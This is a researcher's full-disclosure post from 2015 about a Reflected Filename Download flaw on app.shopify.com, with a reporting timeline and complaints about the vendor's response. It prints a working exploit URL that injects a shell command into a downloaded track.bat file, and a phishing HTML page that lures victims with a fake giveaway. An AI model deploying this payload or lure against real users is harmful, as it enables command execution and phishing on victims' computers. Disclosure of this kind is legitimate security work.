Before Shopify having a bounty program on HackerOne I already sent [on 19 march] a security report about a Reflected Filename Download I found on their website.
It doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The problem is located under app.shopify.com service.

On Internet Explorer 9 and 8 browsers if you run the following link:

[code language=”html”]
https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=
[/code]

It will show download dialog with a file named track.bat that after execution it will run Google Chrome with a malicious webpage (in this case it’s only text).
Of course a malicious user could run any operating system command he wishes.

On other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions you need to visit a page which will force the download using HTML5 <A DOWNLOAD> attribute:

[code language=”html”]
<div align="center">
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a> <
h1>Shopify is giving away premium service!</h1>
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p>
</div>
[/code]

When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.

shopify_chrome_rfd

shopify_opera_rfd

So a possible attack scenario will be:

  1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Shopify) he downloads it
  3. Victim runs the file and his computer it’s hijacked

To the victim, the entire process looks like a file is offered for download from Shopify original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems to much.

So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.

Timeline:
19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.
25-09-2015 Full disclosure